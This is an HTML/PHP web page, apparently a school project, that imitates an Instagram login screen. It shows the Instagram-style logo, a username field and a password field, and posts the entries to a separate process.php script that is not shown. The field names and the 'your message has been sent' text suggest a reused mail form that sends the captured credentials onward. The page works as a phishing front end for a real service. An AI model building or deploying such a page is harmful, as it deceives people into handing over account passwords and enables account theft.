<!DOCTYPE html>
<html lang="en" dir="ltr">
  <head>
    <meta charset="utf-8">
    <title>Andrija Petrovic II-1</title>
      <link href="https://fonts.googleapis.com/css?family=Indie+Flower|Overpass+Mono" rel="stylesheet">
      <link rel="stylesheet" href="main.css">
  </head>
  <style>
      * {
  margin: 0px;
  padding: 0px;
}

body {
  background-color: #eec;
}

#wrapper {
  width: 80%;
  height: 50%;
  overflow: hidden;
  border: 0px solid #000;
  margin: 250px auto;
  padding: 10px;
}

.main-content {
  width: 250px;
  height: 40%;
  margin: 10px auto;
  background-color: #fff;
  border: 2px solid #e6e6e6;
  padding: 40px 50px;
  top: 200px;
}
.form{
   width: 80%;
  height: 50%;
  overflow: hidden;
  border: 0px solid #000;
  margin: 250px auto;
  padding: 10px;
}
.header {
  border: 0px solid #000;
  margin-bottom: 100px;
}

.header img {
  height: 100px;
  width: 350px;
  margin: auto;
  position: relative;
}

.input-1,
.input-2 {
  width: 80%;
  margin-left:10%;
  height: 100px;
  margin-bottom: 5px;
  padding: 8px 12px;
  border: 1px solid #dbdbdb;
  box-sizing: border-box;
  border-radius: 3px;
  margin-top: 5px;
}

.overlap-text {
  position: relative;
}

.overlap-text a {
  position: absolute;
  top: 8px;
  right: 10px;
  color: #003569;
  font-size: 30px;
  text-decoration: none;
  font-family: 'Overpass Mono', monospace;
  letter-spacing: -1px;
}

.btn {
  width: 70%;
  margin-left:15%;
  height: 100px;
  background-color: #3897f0;
  border: 1px solid #3897f0;
  padding: 5px 12px;
  color: #fff;
  font-weight: bold;
  cursor: pointer;
  border-radius: 10px;
  margin-top: 40px;
  
}

footer {
   position: fixed;
   left: 0;
   bottom: 0;
   width: 100%;
   background-color: #a8a8a8;
   color: black;
   text-align: center;
}
@media only screen and (max-width: 1000px) {
  body {
    background-color:lightblue;
  }
  .main-content{
    height: 900px;
  width: 90%;
  }
  
}
placeholder{
font-size: 50px;
}
  </style>
  <body>


<div id="wrapper">
  
  <div class="main-content">
    <br>
  <br>
  <br>
    <br>
    <br>
    <br>
    
    <div class="header">
      <center><img src="https://i.imgur.com/zqpwkLQ.png" /></center>
    </div>
    <div class="card-body">
                         <?php 
                            $Msg = "";
                            if(isset($_GET['error']))
                            {
                                $Msg = " Please Fill in the Blanks ";
                                echo '<div class="alert alert-danger">'.$Msg.'</div>';
                            }
 
                            if(isset($_GET['success']))
                            {
                                $Msg = " Vaša poruka je poslata. ";
                                echo '<div class="alert alert-success">'.$Msg.'</div>';
                            }
                        
                        ?>
                    </div>
    
    <div class="l-part">
       <form action="process.php" method="post">
                            <input type="text" name="Email" placeholder="Username" class="input-1">
                            <input type="password" name="Subject" placeholder="Password" class="input-2">
                            <button class="btn" name="btn-send" border: none;"> Pošalji </button>
                        </form>
    </div>
    
  </div>
</div>
<footer>
<p>Andrija Petrovic II-1<br>Gimnazija Leskovac, Instagram Login</p>
</footer>
  </body>
</html>
